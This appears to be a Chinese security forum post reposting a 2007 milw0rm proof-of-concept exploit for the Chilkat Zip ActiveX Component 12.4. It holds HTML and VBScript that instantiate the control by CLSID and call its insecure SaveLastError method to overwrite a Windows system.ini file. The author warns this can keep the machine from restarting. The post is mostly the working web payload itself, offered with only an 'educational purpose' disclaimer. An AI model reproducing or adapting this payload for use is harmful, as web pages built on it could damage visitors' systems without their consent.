‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Chilkat Zip ActiveX Component 12.4 Multiple Insecure Methods Exploit

sunwear

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3829 
精华
70 
积分
19632 
阅读权限
200 
性别
男 
来自
天津 
在线时间
1681 小时 
注册时间
2004-8-16 
最后登录
2009-1-9 

优秀管理奖 原创技术奖 核心建议奖 资料收集奖

楼主 发表于 2007-7-12 09:40  只看该作者

Chilkat Zip ActiveX Component 12.4 Multiple Insecure Methods Exploit

复制内容到剪贴板
代码:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------
<b>Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0)
"SaveLastError()" and "WriteExe()" Insecure Methods</b>

url: [url]http://www.chilkatsoft.com/[/url]

author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.

<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

This control is marked as:
<b>RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller, data
IPersist Safe: Safe for untrusted: caller, data
IPStorage Safe: Safe for untrusted: caller, data
KillBitSet: Falso</b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
<object classid=&#39;clsid:DB90DEA9-0897-4B02-9FE0-1E321A22EAB0&#39; id=&#39;test&#39;></object>

<script language=&#39;vbscript&#39;>
  test.SaveLastError "c:\windows\system_.ini"
  MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It&#39;s overwritten.", 64,"Chilkat Zip")
</script>
</span>
</code></pre>

# milw0rm.com [2007-07-07]

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题